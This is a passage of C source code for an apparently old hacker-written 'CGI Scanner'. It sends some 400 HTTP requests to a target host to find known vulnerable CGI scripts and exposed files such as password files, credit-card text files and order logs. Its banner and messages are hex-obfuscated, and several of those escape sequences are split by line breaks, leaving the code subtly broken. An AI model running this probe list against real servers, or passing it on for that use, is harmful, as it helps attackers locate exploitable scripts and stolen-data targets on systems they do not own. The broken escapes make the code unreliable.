/_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n"; buff[386]= "GET /scripts/webbbs.exe HTTP/1.0\n\n"; buff[387]= "GET /config/mountain.cfg HTTP/1.0\n\n"; buff[388]= "GET /orders/mountain.cfg HTTP/1.0\n\n"; buff[389]= "GET /admin.php3 HTTP/1.0\n\n"; buff[390]= "GET /code.php3 HTTP/1.0\n\n"; buff[391]= "GET /bb-dnbd/bb-hist.sh HTTP/1.0\n\n"; buff[392]= "GET /reviews/newpro.cgi HTTP/1.0\n\n"; buff[393]= "GET /eatme.idc HTTP/1.0\n\n"; buff[394]= "GET /eatme.ida HTTP/1.0\n\n"; buff[395]= "GET /eatme.pl HTTP/1.0\n\n"; buff[396]= "GET /eatme.idq HTTP/1.0\n\n"; buff[397]= "GET /eatme.idw HTTP/1.0\n\n"; buff[398]= "GET /status.cgi HTTP/1.0\n\n"; buff[399]= "GET /PSUser/PSCOErrPage.htm HTTP/1.0\n\n"; buff[400]= "GET /log HTTP/1.0\n\n"; buff[401]= "GET /stats HTTP/1.0\n\n"; buff[402]= "GET /piranha/secure/passwd.php3 HTTP/1.0\n\n"; buff[403]= "GET /cgi-bin/sojourn.cgi HTTP/1.0\n\n"; buff[404]= "GET /cgi-bin/ews HTTP/1.0\n\n"; buff[405]= "GET /cgi-bin/dfire.cgi HTTP/1.0\n\n"; buff[406]= "GET /cgi-bin/spin_client.cgi HTTP/1.0\n\n"; buff[407]= "GET /cgi-bin/echo.bat HTTP/1.0\n\n"; cnm[1]= "unlg1.1 "; cnm[2]= "unlg1.2 "; cnm[3]= "rwwwshell.pl "; cnm[4]= "gH.cgi "; cnm[5]= "phf "; cnm[6]= "phf.cgi "; cnm[7]= "Count.cgi "; cnm[8]= "test-cgi "; cnm[9]= "nph-test-cgi "; cnm[10]= "nph-publish "; cnm[11]= "php.cgi "; cnm[12]= "php "; cnm[13]= "handler "; cnm[14]= "webgais "; cnm[15]= "websendmail "; cnm[16]= "webdist.cgi "; cnm[17]= "faxsurvey "; cnm[18]= "htmlscript "; cnm[19]= "pfdisplay "; cnm[20]= "perl.exe "; cnm[21]= "wwwboard.cgi "; cnm[22]= "wwwboard.pl "; cnm[23]= "www-sql "; cnm[24]= "view-sousce "; cnm[25]= "campas "; cnm[26]= "aglimpse "; cnm[27]= "glimpse "; cnm[28]= "man.sh "; cnm[29]= "AT-admin.cgi "; cnm[30]= "filemail.cgi "; cnm[31]= "maillist.cgi "; cnm[32]= "jj "; cnm[33]= "info2www "; cnm[34]= "files.pl "; cnm[35]= "finger "; cnm[36]= "bnbform.cgi "; cnm[37]= "survey.cgi "; cnm[38]= "AnyForm2 "; cnm[39]= "textcounter.pl "; cnm[40]= "classifieds.cgi "; cnm[41]= "environ.cgi "; cnm[42]= "wrap "; cnm[43]= "cgiwrap "; cnm[44]= "guestbook.cgi "; cnm[45]= "guestbook.pl "; cnm[46]= "edit.pl "; cnm[47]= "perlshop.cgi "; cnm[48]= "webbbs.cgi "; cnm[49]= "whois_raw.cgi "; cnm[50]= "AnyBoard.cgi "; cnm[51]= "dumpenv.pl "; cnm[52]= "login.cgi "; cnm[53]= "test/test.cgi "; cnm[54]= "_vti_inf.html "; cnm[55]= "vti_bin list "; cnm[56]= "users.pwd "; cnm[57]= "service.pwd "; cnm[58]= "authors.pwd "; cnm[59]= "admin.pwd "; cnm[60]= "administrat.pwd "; cnm[61]= "shtml.dll "; cnm[62]= "shtml.exe "; cnm[63]= "args.bat "; cnm[64]= "uploader.exe "; cnm[65]= "rguest.exe "; cnm[66]= "wguest.exe "; cnm[67]= "bdir.htr - sampl "; cnm[68]= "CGImail.exe "; cnm[69]= "newdsn.exe "; cnm[70]= "getdrvrs.exe "; cnm[71]= "tools/getdrvrs "; cnm[72]= "fpcount.exe "; cnm[73]= "counter.exe "; cnm[74]= "visadmin.exe "; cnm[75]= "perl.exe "; cnm[76]= "cmd.exe bug "; cnm[77]= "submit.cgi "; cnm[78]= "openfile.cfm "; cnm[79]= "exprcalc.cfm "; cnm[80]= "dispopenfile.cfm "; cnm[81]= "sendmail.cfm "; cnm[82]= "detail.cfm "; cnm[83]= "fileexists.cfm "; cnm[84]= "mainframeset.cfm "; cnm[85]= "codebrws.asp "; cnm[86]= "codebrws.asp 2 "; cnm[87]= "showcode.asp "; cnm[88]= "search97.vts "; cnm[89]= "carbo.dll "; cnm[90]= "domcfg?open "; cnm[91]= "?PageServices "; cnm[92]= "autoexec.bat "; cnm[93]= "cfdocs/zero.cfm "; cnm[94]= "cfdocs/root.cfm "; cnm[95]= "expressions.cfm "; cnm[96]= "expeval/eval.cfm "; cnm[97]= "addcontent.cfm "; cnm[98]= "getfile.cfm? "; cnm[99]= "application.cfm "; cnm[100]= "application.cfm "; cnm[101]= "sourcewindow.cfm "; cnm[102]= "parks/detail.cfm "; cnm[103]= "beaninfo.cfm "; cnm[104]= "cfmlsyntaxcheck "; cnm[105]= "viewexample.cfm "; cnm[106]= "gettempdirectory "; cnm[107]= "fileexists.cfm "; cnm[108]= "evaluate.cfm "; cnm[109]= "forums_.mdb "; cnm[110]= "realm_.mdb "; cnm[111]= "data/forums.mdb "; cnm[112]= "data/realm.mdb "; cnm[113]= "cfexamples.mdb "; cnm[114]= "cfsnippets.mdb "; cnm[115]= "smpolicy.mdb "; cnm[116]= "cypress.mdb "; cnm[117]= "DataBase/ "; cnm[118]= "database.nsf/ "; cnm[119]= "cgi-lib.pl "; cnm[120]= "minimal.exe "; cnm[121]= "redir.exe "; cnm[122]= "stats.prg "; cnm[123]= "statsconfig "; cnm[124]= "visitor.exe "; cnm[125]= "htmldocs "; cnm[126]= "cgi-bin/logs "; cnm[127]= "_vti_bin "; cnm[128]= "_vti_adm "; cnm[129]= "_vti_aut "; cnm[130]= "srchadm "; cnm[131]= "iisadmin dir "; cnm[132]= "?PageServices "; cnm[133]= "/scripts/run.exe "; cnm[134]= "ctgestb.htx "; cnm[135]= "ctgestb.idc "; cnm[136]= "details.htx "; cnm[137]= "details.idc "; cnm[138]= "query.htx "; cnm[139]= "query.idc "; cnm[140]= "register.htx "; cnm[141]= "register.idc "; cnm[142]= "sample.htx "; cnm[143]= "sample.idc "; cnm[144]= "sample2.htx "; cnm[145]= "viewbook.htx "; cnm[146]= "viewbook.idc "; cnm[147]= "ct.htx "; cnm[148]= "ctss.idc "; cnm[149]= "dsnform.exe "; cnm[150]= "getdrvrs.exe "; cnm[151]= "mkilog.exe "; cnm[152]= "newdsn.exe "; cnm[153]= "achg.htr "; cnm[154]= "aexp.htr "; cnm[155]= "aexp2.htr "; cnm[156]= "aexp2b.htr "; cnm[157]= "aexp3.htr "; cnm[158]= "aexp4.htr "; cnm[159]= "aexp4b.htr "; cnm[160]= "anot.htr "; cnm[161]= "anot3.htr "; cnm[162]= "writeto.cnf "; cnm[163]= "svcacl.cnf "; cnm[164]= "services.cnf "; cnm[165]= "service.stp "; cnm[166]= "service.cnf "; cnm[167]= "access.cnf "; cnm[168]= "registrations "; cnm[169]= "registrations 2 "; cnm[170]= "register.txt "; cnm[171]= "register.htm "; cnm[172]= "orders.txt "; cnm[173]= "orders.htm "; cnm[174]= "form_results.htm "; cnm[175]= "form_results.txt "; cnm[176]= "admin.dll "; cnm[177]= "scrp perl? "; cnm[178]= "passwd "; cnm[179]= "passwd.txt "; cnm[180]= "password "; cnm[181]= "password.txt "; cnm[182]= "ax.cgi "; cnm[183]= "ax-admin.cgi "; cnm[184]= "convert.bas "; cnm[185]= "admnlogin "; cnm[186]= "cachemgr.cgi "; cnm[187]= "query "; cnm[188]= "rpm_query hmm? "; cnm[189]= "dbmlparser.exe "; cnm[190]= "flexform.cgi "; cnm[191]= "responder.cgi "; cnm[192]= "imagemap.exe "; cnm[193]= "/search "; cnm[194]= "cgi-bin list "; cnm[195]= "scripts list "; cnm[196]= "proxy check? "; cnm[197]= "cfmsytcheck "; cnm[198]= "fileexist.cfm "; cnm[199]= "cfappman "; cnm[200]= "cpshost.dll "; cnm[201]= "queryhit.htm "; cnm[202]= "msadcs.dll "; cnm[203]= "w3proxy.dll "; cnm[204]= "MachineInfo "; cnm[205]= "lwgate "; cnm[206]= "lwgate.cgi "; cnm[207]= "LWGate "; cnm[208]= "LWGate.cgi "; cnm[209]= "nlog-smb.cgi "; cnm[210]= "icat "; cnm[211]= "axs.cgi "; cnm[212]= "publisher "; cnm[213]= "mlog.phtml "; cnm[214]= "envout.bat "; cnm[215]= "archie "; cnm[216]= "bb-hist.sh "; cnm[217]= "nph-error.pl "; cnm[218]= "post_query "; cnm[219]= "ppdscgi.exe "; cnm[220]= "webmap.cgi "; cnm[221]= "getdrvs.exe "; cnm[222]= "upload.pl "; cnm[223]= "ISS/perl "; cnm[224]= "cc.txt "; cnm[225]= "cc.txt 2 "; cnm[226]= "quikstore.cfg "; cnm[227]= "shopper.conf "; cnm[228]= "PDGorderlog "; cnm[229]= "storemgr.pw "; cnm[230]= "query.asp "; cnm[231]= "advsearch.asp "; cnm[232]= "aexp2 "; cnm[233]= "site.csc "; cnm[234]= "Boa?? 8-) "; cnm[235]= "ICQweb "; cnm[236]= "add_ftp.cgi "; cnm[237]= "architext_q.cgi "; cnm[238]= "w3-mspl "; cnm[239]= "bigconf.cgi "; cnm[240]= "ali get32.exe "; cnm[241]= "ali check "; cnm[242]= "tst.bat "; cnm[243]= "status "; cnm[244]= "search.cgi "; cnm[245]= "webhits.exe "; cnm[246]= "aux check "; cnm[247]= "com1 check "; cnm[248]= "com2 check "; cnm[249]= "com3 check "; cnm[250]= "lpt check "; cnm[251]= "con check "; cnm[252]= "/ss.cfg "; cnm[253]= "/ncl_items.html "; cnm[254]= "/submit.cgi "; cnm[255]= "adminlogin "; cnm[256]= "srhadm/admin.idq "; cnm[257]= "webhits.exe smpl "; cnm[258]= "secure/.htaccess "; cnm[259]= "secure/.wwwacl "; cnm[260]= "config/site.csc "; cnm[261]= "jdkRqNotify.exe "; cnm[262]= "catalog_type.asp "; cnm[263]= "catalog_type.asp "; cnm[264]= "tools/newdsn.exe "; cnm[265]= "iisadmin/ism.dll "; cnm[266]= "uploadn.asp "; cnm[267]= "uploadx.asp "; cnm[268]= "upload.asp "; cnm[269]= "repost.asp "; cnm[270]= "postinfo.asp "; cnm[271]= "iisadmin default "; cnm[272]= "details.idc "; cnm[273]= "ctguestb.idc "; cnm[274]= "convert.bas "; cnm[275]= "Fpadmcgi.exe "; cnm[276]= "isapi/srch.htm "; cnm[277]= "index.asp::$DATA "; cnm[278]= "index.asp%81 "; cnm[279]= "domlog.nsf "; cnm[280]= "log.nsf "; cnm[281]= "catalog.nsf "; cnm[282]= "names.nsf "; cnm[283]= "domcfg.nsf "; cnm[284]= "today.nsf "; cnm[285]= "pfdispaly.cgi "; cnm[286]= "input.bat "; cnm[287]= "startstop.html "; cnm[288]= "GetFile.cfm "; cnm[289]= "/../../config.sys "; cnm[290]= "orders/import.txt "; cnm[291]= "config/import.txt "; cnm[292]= "orders/checks.txt "; cnm[293]= "config/check.txt "; cnm[294]= "/webcart/ dir "; cnm[295]= "msadc adctest.asp "; cnm[296]= "fpadmin.htm "; cnm[297]= "admcgi contents "; cnm[298]= "form_results.txt "; cnm[299]= "form_results.htm "; cnm[300]= "register.htm "; cnm[301]= "service.cnf "; cnm[302]= "service.stp "; cnm[303]= "services.cnf "; cnm[304]= "svcacl.cnf "; cnm[305]= "writeto.cnf "; cnm[306]= "access.cnf "; cnm[307]= "_vti_aut author "; cnm[308]= "_vti_author dll "; cnm[309]= "AnForm2 "; cnm[310]= "calendar "; cnm[311]= "redirect "; cnm[312]= "w3tvars.pm "; cnm[313]= "w2-msql "; cnm[314]= "wais.pl "; cnm[315]= "wwwuploader.exe "; cnm[316]= "MachineInfo "; cnm[317]= "snorkerz.cmd "; cnm[318]= "snorkerz.bat "; cnm[319]= "cgi-bin/dig.cgi "; cnm[320]= "AT-generate.cgi "; cnm[321]= "con/con check ;-) "; cnm[322]= "/........./ "; cnm[323]= "win-sample.exe "; cnm[324]= "iss ../.. "; cnm[325]= "classified cgi "; cnm[326]= "download.cgi "; cnm[327]= "alibaba hole "; cnm[328]= "iss dot bug "; cnm[329]= "dos checking "; cnm[330]= "XITAMI testcgi "; cnm[331]= "FormHandler.cgi "; cnm[332]= "cgitest.exe "; cnm[333]= "meta.pl "; cnm[334]= "test-cgi.tcl "; cnm[335]= "day5copier.cgi "; cnm[336]= "test.bat "; cnm[337]= "hello.bat "; cnm[338]= "webutils.pl "; cnm[339]= "tigvote.cgi "; cnm[340]= "args.cmd "; cnm[341]= "senvironment "; cnm[342]= "load_webenv "; cnm[343]= "mailtest.nhtml "; cnm[344]= "WebSTART%20LOG "; cnm[345]= "webwho.pl "; cnm[346]= "htsearch "; cnm[347]= "plusmail "; cnm[348]= "dig.cgi "; cnm[349]= "rmp_query "; cnm[350]= "search.cgi "; cnm[351]= "w3-msql "; cnm[352]= "tpgnrock "; cnm[353]= "cgi/cgiproc "; cnm[354]= "dvwssr.dll "; cnm[355]= "cart32.exe "; cnm[356]= "ultraboard.cgi "; cnm[357]= "ultraboard.pl "; cnm[358]= "cart32clientlist "; cnm[359]= "c32web.exe "; cnm[360]= "c32web.exe 2 "; cnm[361]= "form.cgi "; cnm[362]= "message.cgi "; cnm[363]= "siteUserMod.cgi "; cnm[364]= ".fhp "; cnm[365]= "excite "; cnm[366]= "getdoc.cgi "; cnm[367]= "webplus "; cnm[368]= "bizdb1-search.cgi "; cnm[369]= "cart.pl "; cnm[370]= "maillist.pl "; cnm[371]= "fpexplore.exe "; cnm[372]= "whois.cgi "; cnm[373]= "GW5/GWWEB.EXE "; cnm[374]= "tidfinder.cgi "; cnm[375]= "tablebuild.pl "; cnm[376]= "displayTC.pl "; cnm[377]= "rdist/expand.c ? "; cnm[378]= "c_download.cgi "; cnm[379]= "ntitar.pl "; cnm[380]= "enter.cgi "; cnm[381]= "printenv "; cnm[382]= "fm_shell.asp "; cnm[383]= "cgiback.cgi "; cnm[384]= "infosrch.cgi "; cnm[385]= "author.dll "; cnm[386]= "webbbs.exe "; cnm[387]= "mountain.cfg "; cnm[388]= "mountain.cfg "; cnm[389]= "/admin.php3 "; cnm[390]= "/code.php3 "; cnm[391]= "/bb-hist.sh "; cnm[392]= "newpro.cgi "; cnm[393]= "/eatme.idc "; cnm[394]= "/eatme.ida "; cnm[395]= "/eatme.pl "; cnm[396]= "/eatme.idq "; cnm[397]= "/eatme.idw "; cnm[398]= "/status.cgi "; cnm[399]= "PSCOErrPage.htm "; cnm[400]= "/log "; cnm[401]= "/stats "; cnm[402]= "passwd.php3 "; cnm[403]= "sojourn.cgi "; cnm[404]= "ews "; cnm[405]= "dfire.cgi "; cnm[406]= "spin_client.cgi "; cnm[407]= "echo.bat "; printf("\n\x20\x5b\x2d\x2d\x20\x43\x47\x49\x20\x53\x63\x61\x6e\x6e\x65\x72\x 20"); printf("\x76\x2e\x32\x2e\x34\x30\x20\x28\x63\x29\x20\x62\x79\x20"); printf(meeeeeeeeeeee); printf("\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"); printf("\x20\x2d\x2d\x5d\n"); printf("\x20\x5b\x2d\x2d\x20\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6e\x66\x65\x63 \x74\x65\x64\x2e\x69\x6c\x6d\x2e\x6e\x65\x74\x2f"); printf("\x20\x20\x20\x20\x20\x20\x20\x50\x75\x62\x6c\x69\x63\x20\x65\x6d\x61 \x69\x6c\x3a\x75\x6E\x6C\x67\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D\x2 0\x2d\x2d\x5d\n"); if (argc<2) { printf(" usage: %s host ", argv[0]); printf("\n or: %s host -d for debug mode\n\n",argv[0]); exit(1); } if (argc>2) { if (strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\x53\x74\x61\x72\x74\x69\x6e\x67\x2e\x2e\x2e\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET,SOCK_STREAM,0); bcopy(he->h_addr, (char *)&sin.sin_addr,he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(curport); if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0) { perror("\x63\x6f\x6e\x6e\x65\x63\x74"); } printf("\n\n\t\x20\x5b\x20\x50\x72\x65\x73\x73\x20\x61\x6e\x79\x20k\x65\x79\ x20"); printf("2\x20\x6fu\x74\x20t\x68\x65\x20ht\x74\x70\x64\x20v\x65\x72"); printf("\x73i\x6f\x6e\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x20\x5d\n"); getchar(); send(sock, "\x48\x45\x41\x44\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\n\n " ,17,0); recv(sock, buffer,sizeof(buffer),0); printf("%s", buffer); close(sock); printf("\n\t\x20\x5b\x20\x50\x72\x65\x73\x73\x20\x61\x6e\x79\x20\x6b\x65\x79 \x20"); printf("\x32\x20s\x65\x61\x72\x63\x68\x20\x34\x20\x43\x47\x69\x20"); printf("s\x74\x75\x66\x66\x2e\x2e\x2e\x2e\x2e\x2e\x20\x5d\n"); getchar(); while(count++ <407) /* huh! >400 cgi..!!!.. */ { sock=socket(AF_INET,SOCK_STREAM,0); bcopy(he->h_addr,(char *)&sin.sin_addr,he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(curport); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin)) !=0 ) { perror("c\x6fnn\x65\x63t"); } for (numin=0;numin<1024;numin++) { cgibuff[numin] = '\0'; } send (sock, buff[count], strlen(buff[count]),0); recv(sock, cgibuff,sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if (cgistr != NULL) { printf("\x53\x65\x61\x72\x63\x69\x6e\x67\x20\x66\x6f\x72\x20 %s \x20",cnm[co unt]); printf(":\x20\x46\x6f\x75\x6e\x64\x20\x21\x21\x20\x3b\x29\n"); ++succeess; } if (debugm==1) { printf("\n\n\x2d--\x2d\x2d------\x2d----\x2d----\x2d--\n"); printf("%s",cgibuff); printf("\n\n\x2d--\x2d\x2d------\x2d----\x2d----\x2d--\n"); printf("\x50\x72\x65\x73\x73\x20\x61\x6e\x79\x20k\x65\x79\x20\x32\x20\x63\x6 f"); printf("\x6e\x74\x69\x6eu\x65\x2e\x2e\x2e\x2e\x2e\x2e\n"); getchar(); } close(sock); } if (!succeess) { printf("\x68\x65\x79\x20\x64\x75\x64\x65\x21\x20\x62\x61\x64\x20\x6e\x65\x 77\x73\x2e\x2e\x2e\x2e\x2e"); printf("\x6e\x30\x74h\x31\x6eg\x20\x2e\x2e\x2e\x20"); printf("\x4e\x4e\x30\x30\x30\x54\x54\x54\x48\x31\x31\x31\x4e\x4e\x47\x21\x20 :\x2d\x29\n"); } else { printf("\x2e\x2e.h\x61v\x65\x20\x61\x20\x6ei\x63\x65\x20h\x61\x63\x6b "); printf("\x2e\x2e\x2e\x20\x2d\x20"); printf("\x66\x6f\x75\x6e\x64\x20%d\x20\x43\x47\x69\x73\n",succeess); } exit(0); } /* EOF - UnlG - EOF - UnlG - EOF - UnlG - EOF - UnlG - EOF - UnlG -EOF */ /* yu=-sch" passed thru infected network "sch-=yu */ /* yu=-sch" http://infected.ilm.net/ "sch-=yu */